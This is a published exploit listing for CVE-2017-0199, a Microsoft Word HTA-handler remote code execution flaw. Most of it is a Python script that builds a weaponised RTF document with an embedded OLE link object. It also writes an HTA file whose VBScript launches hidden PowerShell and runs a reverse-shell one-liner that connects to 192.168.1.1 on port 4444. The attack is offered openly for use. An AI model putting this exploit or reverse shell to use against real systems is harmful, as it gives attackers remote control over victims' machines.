Microsoft Word MTA Handler Remote Code Execution



EKU-ID: 6736 CVE: 2017-0199 OSVDB-ID:
Author: Juan Sacco Published: 2017-06-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Author: Juan Sacco at KPN Red Team
# Developed using Exploit Pack -  http://www.exploitpack.com
<jsacco@exploitpack.com>
#
# Description: Microsoft Word (CVE-2017-0199) is prone to a RCE trough
a HTA Handler
# A remote code execution vulnerability exists in the way that
Microsoft Office and WordPad parse specially crafted files.
# An attacker who successfully exploited this vulnerability could take
control of an affected system.
#
# Impact: An attacker could exploit this vulnerability to execute
arbitrary commands in the
# context of the application. Failed exploit attempts could result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.microsoft.com
#
# Credits: @ShadowBrokerss @EquationGroup @Petya @juansacco

import binascii
def chunk_str(str, chunk_size):
 return [str[i:i+chunk_size] for i in range(0, len(str), chunk_size)]
hta_host="" # 127.0.0.1
for i in chunk_str(binascii.hexlify(b'http://127.0.0.1'),2):
    hta_host+= str(i+"00")
hta_host="" # 127.0.0.1
hta_object = "01000002090000000100000000000000"
hta_object += "0000000000000000a4000000e0c9ea79"
hta_object += "f9bace118c8200aa004ba90b8c000000"
hta_object += hta_host
hta_object += "00000000795881f43b1d7f48af2c825d"
hta_object += "c485276300000000a5ab0000ffffffff"
hta_object += "0609020000000000c000000000000046"
hta_object += "00000000ffffffff0000000000000000"
hta_object += "906660a637b5d2010000000000000000"
hta_object += "00000000000000000000000000000000"
hta_object += "100203000d0000000000000000000000"
hta_object += "0"*480
rtf_template = "{\\rtf1\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi31507\\deflang1033\\deflangfe2052\\themelang1033\\themelangfe2052\\themelangcs0\r\n{\\info\r\n{\\author
Microsoft}\r\n{\\operator Microsoft}\r\n}\r\n{\\*\\xmlnstbl {\\xmlns1
http://schemas.microsoft.com/office/word/2003/wordml}}\r\n{\r\n{\\object\\objautlink\\objupdate\\rsltpict\\objw291\\objh230\\objscalex99\\objscaley101\r\n{\\*\\objclass
Word.Document.8}\r\n{\\*\\objdata
0105000002000000\r\n090000004f4c45324c696e6b000000000000000000000a0000\r\nd0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nfffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d\r\n6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000\r\n0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000\r\n00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\n"
rtf_template += hta_object
rtf_template += "0105000000000000}\r\n{\\result {\\rtlch\\fcs1
\\af31507 \\ltrch\\fcs0 \\insrsid1979324 }}}}\r\n{\\*\\datastore
}\r\n}\r\n"
print("[*] Microsoft Word RCE - HTA Handler by Juan Sacco")
file_rtf = open("exploitpack.rtf","w")
file_rtf.write(rtf_template)
file_rtf.close()
print("[*] RTF File created")
print rtf_template
# Extra bonus PS Reverse one-liner
ps_reverse_shell = "$sm=(New-Object
Net.Sockets.TCPClient(\"192.168.1.1\",4444)).GetStream();[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length))
-ne 0){;$d=(New-Object
Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex
$d 2>&1));$sm.Write($st,0,$st.Length)}\r\n" # Reverse to 192.168.1.1
4444
hta_template = "<script language=\"VBScript\">\r\nSet pwnShell =
CreateObject(\"Wscript.Shell\") \r\nSet fsObject =
CreateObject(\"Scripting.FileSystemObject\")\r\nIf
fsObject.FileExists(pwnShell.ExpandEnvironmentStrings(\"%PSModulePath%\")
+ \"..\\powershell.exe\") Then\r\n    pwnShell.Run \"powershell.exe
-nop -w hidden -e "
hta_template += ps_reverse_shell
hta_template += "\",0\r\nEnd If\r\nwindow.close()\r\n</script>\r\n"
file_hta = open("exploitpack.hta","w")
file_hta.write(hta_template)
file_hta.close()
print("[*] HTA File created")
print hta_template
print("[*] Thanks NSA!")
print("[*] Creditz: @EquationGroup @ShadowBrokers @juansacco")
print("[*] KPN Red team: <juan.sacco@kpn.com>")